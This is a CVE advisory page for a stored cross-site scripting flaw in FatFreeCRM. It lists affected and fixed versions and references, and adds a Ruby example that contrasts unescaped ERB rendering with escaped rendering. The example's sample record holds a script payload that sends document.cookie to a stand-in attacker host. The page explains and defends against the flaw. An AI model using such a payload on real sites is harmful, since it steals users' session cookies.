Vulnerability Description
FatFreeCRM versions <=0.14.1, >=0.15.0 <=0.15.1, >=0.16.0 <=0.16.3, >=0.17.0 <=0.17.2 and ==0.18.0 contain a Cross Site Scripting (XSS) vulnerability, present as of commit 6d60bc8ed010c4eda05d6645c64849f415f68d65, that can result in JavaScript execution. The attack appears to be exploitable by storing content that carries a JavaScript payload: the payload is executed in end users' browsers when they visit the page that renders that content (the stored XSS pattern). The vulnerability appears to have been fixed in 0.18.1, 0.17.3, 0.16.4, 0.15.2 and 0.14.2.
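The following is an added illustrative example, not code from FatFreeCRM or from the advisory: it reproduces the class of bug described above (user-supplied CRM content copied into a page without HTML escaping) beside the escaped rendering that neutralises it, plus a post-render check. The record, the templates and the payload are all constructed for this example; the advisory does not identify which field or view in FatFreeCRM was affected.

```ruby
require "erb"

# Added illustrative example (not FatFreeCRM code): the stored-XSS pattern the
# advisory describes, i.e. user-supplied CRM content rendered into a page
# without HTML escaping, next to the escaped rendering that neutralises it.

# Constructed sample record; the payload is made up for this example.
SAMPLE_RECORD = {
  name:  "Acme Corp",
  notes: %q{<script>fetch('https://attacker.example/?c='+document.cookie)</script>},
}.freeze

# Hypothetical templates for a record detail page. Both use stock ERB; the
# only difference is whether the field values are escaped before insertion.
UNSAFE_TEMPLATE = ERB.new(
  %q{<h1><%= record[:name] %></h1><div class="notes"><%= record[:notes] %></div>}
)
SAFE_TEMPLATE = ERB.new(
  %q{<h1><%= ERB::Util.html_escape(record[:name]) %></h1>} +
  %q{<div class="notes"><%= ERB::Util.html_escape(record[:notes]) %></div>}
)

# Vulnerable rendering: the stored notes field is copied into the HTML verbatim,
# so a <script> element stored by one user runs in every viewer's browser.
def render_unsafe(record)
  UNSAFE_TEMPLATE.result(binding)
end

# Hardened rendering: every interpolated value is HTML-escaped, so the payload
# survives only as text (&lt;script&gt;...), which the browser will not execute.
def render_safe(record)
  SAFE_TEMPLATE.result(binding)
end

# Simple post-render check a test suite can run on a page body: true when any
# raw tag from the untrusted input reached the output unescaped.
def unescaped_markup?(html, untrusted_value)
  tags = untrusted_value.scan(/<[^>]+>/)
  tags.any? { |tag| html.include?(tag) }
end

if __FILE__ == $PROGRAM_NAME
  puts "unsafe: #{render_unsafe(SAMPLE_RECORD)}"
  puts "safe:   #{render_safe(SAMPLE_RECORD)}"
  puts "unsafe leaks markup? #{unescaped_markup?(render_unsafe(SAMPLE_RECORD), SAMPLE_RECORD[:notes])}"
  puts "safe leaks markup?   #{unescaped_markup?(render_safe(SAMPLE_RECORD), SAMPLE_RECORD[:notes])}"
end
```

The escaping shown is the stdlib `ERB::Util.html_escape`; in a Rails application the equivalent protection is the default auto-escaping of `<%= %>`, which is lost wherever a view marks user content with `raw` or `html_safe`. When auditing a fix like the one referenced below, the check to make is that no such bypass remains on the path from stored content to the rendered page.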
CVSS Score
6.1 (MEDIUM)
Affected Products
| Vendor | Product | Versions |
|---|---|---|
| Fatfreecrm | Fatfreecrm | <= 0.14.1 |
| Fatfreecrm | Fatfreecrm | >= 0.15.0, <= 0.15.1 |
| Fatfreecrm | Fatfreecrm | >= 0.16.0, <= 0.16.3 |
| Fatfreecrm | Fatfreecrm | >= 0.17.0, <= 0.17.2 |
| Fatfreecrm | Fatfreecrm | == 0.18.0 |
Related Weaknesses (CWE)
References
- https://github.com/asteinhauser/fat_free_crm/commit/306f940b26ccf3f406665f07bece (Patch)
- https://github.com/asteinhauser/fat_free_crm/issues/1 (Third Party Advisory)
- https://github.com/fatfreecrm/fat_free_crm/wiki/XSS-Vulnerability-%282018-10-27% (Patch, Third Party Advisory)
- https://groups.google.com/forum/#%21topic/fat-free-crm-users/TxsdZXSe7Jc
FAQ
What is CVE-2018-1000842?
CVE-2018-1000842 is a Cross Site Scripting (XSS) vulnerability in FatFreeCRM with a CVSS base score of 6.1 (MEDIUM). Affected versions are <=0.14.1, >=0.15.0 <=0.15.1, >=0.16.0 <=0.16.3, >=0.17.0 <=0.17.2 and ==0.18.0; content containing a JavaScript payload is executed in the browsers of end users who visit the page that renders it. See the Vulnerability Description above.
How severe is CVE-2018-1000842?
CVE-2018-1000842 has been rated MEDIUM with a CVSS base score of 6.1/10. As a cross-site scripting issue, its impact is script execution in the browser of any user who views the attacker-supplied content, rather than direct compromise of the server hosting FatFreeCRM.
Is there a patch for CVE-2018-1000842?
Yes. Fixed releases are 0.18.1, 0.17.3, 0.16.4, 0.15.2 and 0.14.2, one for each affected release line; upgrade to the fixed release for the line you run. The references section above links the fixing commit, the project's wiki advisory and the mailing-list announcement. Affected product: Fatfreecrm Fatfreecrm.